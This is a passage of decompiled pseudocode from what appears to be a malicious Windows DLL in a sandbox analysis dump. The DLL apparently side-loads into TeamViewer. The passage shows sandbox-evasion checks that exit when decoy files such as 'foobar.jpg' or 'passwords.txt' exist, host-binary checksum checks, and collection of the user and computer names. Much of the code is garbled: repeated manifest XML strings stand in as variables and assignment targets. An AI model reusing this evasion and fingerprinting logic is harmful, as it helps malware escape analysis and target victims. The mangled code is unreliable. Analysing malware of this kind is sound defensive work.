                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t264);
                                                                                                                        					}
                                                                                                                        					_t265 = M6F340520; // 0x996738
                                                                                                                        					__eflags = _t265;
                                                                                                                        					if(_t265 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t265);
                                                                                                                        					}
                                                                                                                        					_t266 = M6F340524; // 0x9954b0
                                                                                                                        					__eflags = _t266;
                                                                                                                        					if(_t266 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t266);
                                                                                                                        					}
                                                                                                                        					_t267 = M6F340528; // 0x9773e8
                                                                                                                        					__eflags = _t267;
                                                                                                                        					if(_t267 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t267);
                                                                                                                        					}
                                                                                                                        					_t268 = M6F340530; // 0x997378
                                                                                                                        					__eflags = _t268;
                                                                                                                        					if(_t268 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t268);
                                                                                                                        					}
                                                                                                                        					_t269 = M6F340534; // 0x98a1a0
                                                                                                                        					__eflags = _t269;
                                                                                                                        					if(_t269 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t269);
                                                                                                                        					}
                                                                                                                        					_t270 = M6F3404F8; // 0x99b7a8
                                                                                                                        					__eflags = _t270;
                                                                                                                        					if(_t270 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t270);
                                                                                                                        					}
                                                                                                                        					_t271 = M6F340504; // 0x99ec68
                                                                                                                        					__eflags = _t271;
                                                                                                                        					if(_t271 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t271);
                                                                                                                        					}
                                                                                                                        					_t272 = M6F3404F4; // 0x99b258
                                                                                                                        					__eflags = _t272;
                                                                                                                        					if(_t272 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t272);
                                                                                                                        					}
                                                                                                                        					_t273 = M6F340500; // 0x977288
                                                                                                                        					__eflags = _t273;
                                                                                                                        					if(_t273 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t273);
                                                                                                                        					}
                                                                                                                        					_t274 = M6F3404CC; // 0x99d818
                                                                                                                        					__eflags = _t274;
                                                                                                                        					if(_t274 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t274);
                                                                                                                        					}
                                                                                                                        					_t275 = M6F3404D0; // 0x98a4d0
                                                                                                                        					__eflags = _t275;
                                                                                                                        					if(_t275 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t275);
                                                                                                                        					}
                                                                                                                        					__eflags = "\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x1
                                                                                                                        					if(__eflags != 0) {
                                                                                                                        						_t277 = M6F3404A8; // 0x6f240000
                                                                                                                        						__eflags = _t277;
                                                                                                                        						if(_t277 != 0) {
                                                                                                                        							FreeLibrary(_t277);
                                                                                                                        						}
                                                                                                                        						_t278 = M6F340490; // 0x770a0000
                                                                                                                        						__eflags = _t278;
                                                                                                                        						if(_t278 != 0) {
                                                                                                                        							FreeLibrary(_t278);
                                                                                                                        						}
                                                                                                                        						_t279 = M6F340494; // 0x748e0000
                                                                                                                        						__eflags = _t279;
                                                                                                                        						if(_t279 != 0) {
                                                                                                                        							FreeLibrary(_t279);
                                                                                                                        						}
                                                                                                                        						_t280 = M6F340498; // 0x76130000
                                                                                                                        						__eflags = _t280;
                                                                                                                        						if(_t280 != 0) {
                                                                                                                        							FreeLibrary(_t280);
                                                                                                                        						}
                                                                                                                        						_t281 = M6F34049C; // 0x73c30000
                                                                                                                        						__eflags = _t281;
                                                                                                                        						if(_t281 != 0) {
                                                                                                                        							FreeLibrary(_t281);
                                                                                                                        						}
                                                                                                                        						_t282 = M6F3404A0; // 0x773a0000
                                                                                                                        						__eflags = _t282;
                                                                                                                        						if(_t282 != 0) {
                                                                                                                        							FreeLibrary(_t282);
                                                                                                                        						}
                                                                                                                        						_t283 = M6F3404A4; // 0x70950000
                                                                                                                        						__eflags = _t283;
                                                                                                                        						if(_t283 != 0) {
                                                                                                                        							FreeLibrary(_t283);
                                                                                                                        						}
                                                                                                                        						_t284 =  *0x6f34047c; // 0x998bd0
                                                                                                                        						__eflags = _t284;
                                                                                                                        						if(_t284 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t284);
                                                                                                                        						}
                                                                                                                        						_t285 = M6F3404D4; // 0x988bb8
                                                                                                                        						__eflags = _t285;
                                                                                                                        						if(_t285 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t285);
                                                                                                                        						}
                                                                                                                        						_t286 = M6F3404DC; // 0x99b1c8
                                                                                                                        						__eflags = _t286;
                                                                                                                        						if(_t286 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t286);
                                                                                                                        						}
                                                                                                                        						_t287 = M6F3404D8; // 0x99b240
                                                                                                                        						__eflags = _t287;
                                                                                                                        						if(_t287 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t287);
                                                                                                                        						}
                                                                                                                        						_t288 = M6F3404F0; // 0x998d58
                                                                                                                        						__eflags = _t288;
                                                                                                                        						if(_t288 != 0) {
                                                                                                                        							LocalFree(_t288);
                                                                                                                        						}
                                                                                                                        						__eflags = M6F340614 - 2;
                                                                                                                        						if(M6F340614 == 2) {
                                                                                                                        							E6F33B840(0);
                                                                                                                        						}
                                                                                                                        						__eflags = M6F340614; // 0x2
                                                                                                                        						if(__eflags > 0) {
                                                                                                                        							E6F33B510();
                                                                                                                        						}
                                                                                                                        						_t598 = 0x6f34046c;
                                                                                                                        						do {
                                                                                                                        							_t289 =  *_t598;
                                                                                                                        							__eflags = _t289;
                                                                                                                        							if(_t289 != 0) {
                                                                                                                        								CloseHandle(_t289);
                                                                                                                        							}
                                                                                                                        							_t598 =  &(_t598[1]);
                                                                                                                        							__eflags = _t598 - 0x6f340478;
                                                                                                                        						} while (_t598 < 0x6f340478);
                                                                                                                        						_t290 = M6F340510; // 0x0
                                                                                                                        						__eflags = _t290;
                                                                                                                        						if(_t290 != 0) {
                                                                                                                        							NtTerminateThread(_t290, 0);
                                                                                                                        							_t541 = M6F340510; // 0x0
                                                                                                                        							CloseHandle(_t541);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					goto L131;
                                                                                                                        				} else {
                                                                                                                        					if(_t262 != 1) {
                                                                                                                        						L131:
                                                                                                                        						return 1;
                                                                                                                        					} else {
                                                                                                                        						DisableThreadLibraryCalls(_a4);
                                                                                                                        						"<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = GetModuleHandleA(0);
                                                                                                                        						_v928 = 0;
                                                                                                                        						_t343 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						"on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t343;
                                                                                                                        						if(GetSystemDirectoryA(_t343, 0x105) == 0) {
                                                                                                                        							ExitProcess(0);
                                                                                                                        						}
                                                                                                                        						_t502 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        						PathAddBackslashA(_t502); // executed
                                                                                                                        						_t347 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						"     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t347;
                                                                                                                        						M6F34052C = GetModuleFileNameA(_a4, _t347, 0x104);
                                                                                                                        						_t350 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						_t503 = M6F34052C; // 0x33
                                                                                                                        						_t543 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        						M6F340524 = _t350;
                                                                                                                        						RtlMoveMemory(_t350, _t543, _t503);
                                                                                                                        						_t351 = M6F340524; // 0x9954b0
                                                                                                                        						_t352 = E6F33A360(_t351, 0, 0);
                                                                                                                        						_t504 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        						M6F340528 = _t352;
                                                                                                                        						PathRemoveFileSpecA(_t504);
                                                                                                                        						_t544 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        						PathAddBackslashA(_t544);
                                                                                                                        						_t355 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        						SetCurrentDirectoryA(_t355);
                                                                                                                        						_t505 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        						_t357 = E6F33A360(_t505, 0, 0);
                                                                                                                        						_t611 =  &_v936 + 0x18;
                                                                                                                        						M6F340520 = _t357; // executed
                                                                                                                        						__imp__SHGetSpecialFolderPathA(0,  &_v276, 0, 0); // executed
                                                                                                                        						if(_t357 != 0) {
                                                                                                                        							PathAddBackslashA( &_v292);
                                                                                                                        							_v948 = 0x626f6f66; // little-endian bytes "foob"
                                                                                                                        							_v944 = 0x6a2e7261; // "ar.j"
                                                                                                                        							_v940 = 0x6770; // "pg"
                                                                                                                        							_v938 = 0; // NUL terminator; stack string reads "foobar.jpg"
                                                                                                                        							wsprintfA( &_v556, "%s%s",  &_v292,  &_v948);
                                                                                                                        							_t633 = _t611 + 0x10;
                                                                                                                        							_t489 = GetFileAttributesA( &_v548); // executed
                                                                                                                        							if(_t489 != 0xffffffff) { // 0xffffffff is INVALID_FILE_ATTRIBUTES, so this branch means the file exists
                                                                                                                        								ExitProcess(0);
                                                                                                                        							}
                                                                                                                        							_v956 = 0x74646f2e; // little-endian bytes ".odt"
                                                                                                                        							_v952 = 0; // NUL terminator
                                                                                                                        							wsprintfA( &_v548, "%s%s%s",  &_v284,  &_v940,  &_v956);
                                                                                                                        							_t611 = _t633 + 0x14;
                                                                                                                        							_t493 = GetFileAttributesA( &_v540); // executed
                                                                                                                        							if(_t493 != 0xffffffff) {
                                                                                                                        								_v947 = 0x7472; // "rt"
                                                                                                                        								_v945 = 0x66; // "f"; extension bytes now read "rtf"
                                                                                                                        								wsprintfA( &_v540, "%s%s%s",  &_v276,  &_v932,  &_v948);
                                                                                                                        								_t611 = _t611 + 0x14;
                                                                                                                        								if(GetFileAttributesA( &_v532) != 0xffffffff) {
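                                                                                                                        									_v844 = 0x73736170; // little-endian bytes "pass"
                                                                                                                        									_v840 = 0x64726f77; // "word"
                                                                                                                        									_v836 = 0x73; // "s"; stack string reads "passwords"
                                                                                                                        									_v939 = 0x7874; // "tx"
                                                                                                                        									_v937 = 0x74; // "t"; extension bytes now read "txt"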
                                                                                                                        									wsprintfA( &_v532, "%s%s%s",  &_v268,  &_v844,  &_v940);
                                                                                                                        									_t611 = _t611 + 0x14;
                                                                                                                        									if(GetFileAttributesA( &_v524) == 0xffffffff) {
                                                                                                                        										goto L11;
                                                                                                                        									} else {
                                                                                                                        										ExitProcess(0);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						L11:
                                                                                                                        						_t359 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						M6F340530 = _t359;
                                                                                                                        						_t360 = GetModuleFileNameA(0, _t359, 0x104);
                                                                                                                        						_t546 = M6F340530; // 0x997378
                                                                                                                        						M6F340538 = _t360;
                                                                                                                        						M6F34053C = PathFindFileNameA(_t546);
                                                                                                                        						_t362 = M6F340530; // 0x997378
                                                                                                                        						_t363 = E6F33A360(_t362, 0, 0);
                                                                                                                        						M6F340534 = _t363;
                                                                                                                        						L6F33C2EE();
                                                                                                                        						 *0x6f340278 = 0x11c;
                                                                                                                        						L6F33C34E();
                                                                                                                        						M6F340548 = E6F333280(0);
                                                                                                                        						_t365 = E6F333220(0);
                                                                                                                        						_t613 = _t611 + 0x14;
                                                                                                                        						M6F340544 = _t365;
                                                                                                                        						__imp__WTSGetActiveConsoleSessionId(0x6f340278, 0x6f340278, 0x11c);
                                                                                                                        						M6F3404E8 = _t365;
                                                                                                                        						_t366 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x400000
                                                                                                                        						if( *_t366 != 0x5a4d) { // "MZ" DOS header signature
                                                                                                                        							goto L131;
                                                                                                                        						} else {
                                                                                                                        							_t39 = _t366 + 0x3c; // 0x100
                                                                                                                        							_t601 =  *_t39 + _t366;
                                                                                                                        							if( *_t601 != 0x4550) { // "PE" signature at the offset read from e_lfanew (+0x3c)
                                                                                                                        								goto L131;
                                                                                                                        							} else {
                                                                                                                        								_v860 =  *((intOrPtr*)(_t601 + 0x58)); // optional header CheckSum field
                                                                                                                        								_v976 =  *(_t601 + 8); // file header TimeDateStamp field
                                                                                                                        								_v844 = 0x104;
                                                                                                                        								_t369 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
                                                                                                                        								M6F3404F8 = _t369;
                                                                                                                        								if(_t369 != 0) {
                                                                                                                        									_t483 = GetUserNameW(_t369,  &_v844); // executed
                                                                                                                        									if(_t483 == 0) {
                                                                                                                        										_t484 = M6F3404F8; // 0x99b7a8
                                                                                                                        										 *_t484 = 0;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_v856 = 0x104;
                                                                                                                        								_t371 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
                                                                                                                        								M6F340504 = _t371;
                                                                                                                        								if(_t371 != 0) {
                                                                                                                        									__imp__GetComputerNameExW(3, _t371,  &_v856); // executed
                                                                                                                        									_t371 = M6F340504; // 0x99ec68
                                                                                                                        									if(_t371 == 0) {
                                                                                                                        										 *_t371 = 0;
                                                                                                                        										_t371 = M6F340504; // 0x99ec68
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t507 = M6F3404F8; // 0x99b7a8
                                                                                                                        								if(_t507 != 0) {
                                                                                                                        									M6F3404F4 = E6F33A2F0(_t507, 0, 0);
                                                                                                                        									_t371 = M6F340504; // 0x99ec68
                                                                                                                        									_t613 = _t613 + 0xc;
                                                                                                                        								}
                                                                                                                        								if(_t371 != 0) {
                                                                                                                        									_t481 = E6F33A2F0(_t371, 0, 0);
                                                                                                                        									_t613 = _t613 + 0xc;
                                                                                                                        									M6F340500 = _t481;
                                                                                                                        								}
                                                                                                                        								_t373 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        								M6F3404CC = _t373;
                                                                                                                        								if(_t373 != 0) {
                                                                                                                        									_t531 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        									wsprintfA(_t373, "%s%s%s", _t531, "TeamViewer", ".ini");
                                                                                                                        									_t576 = M6F3404CC; // 0x99d818
                                                                                                                        									_t480 = E6F33A360(_t576, 0, 0);
                                                                                                                        									_t613 = _t613 + 0x20;
                                                                                                                        									M6F3404D0 = _t480;
                                                                                                                        								}
                                                                                                                        								if(_v860 == 0x435a88 || _v976 == 0x4b4ca51f) { // compares the CheckSum and TimeDateStamp read above against fixed values
                                                                                                                        									_push( &M6F3404F0);
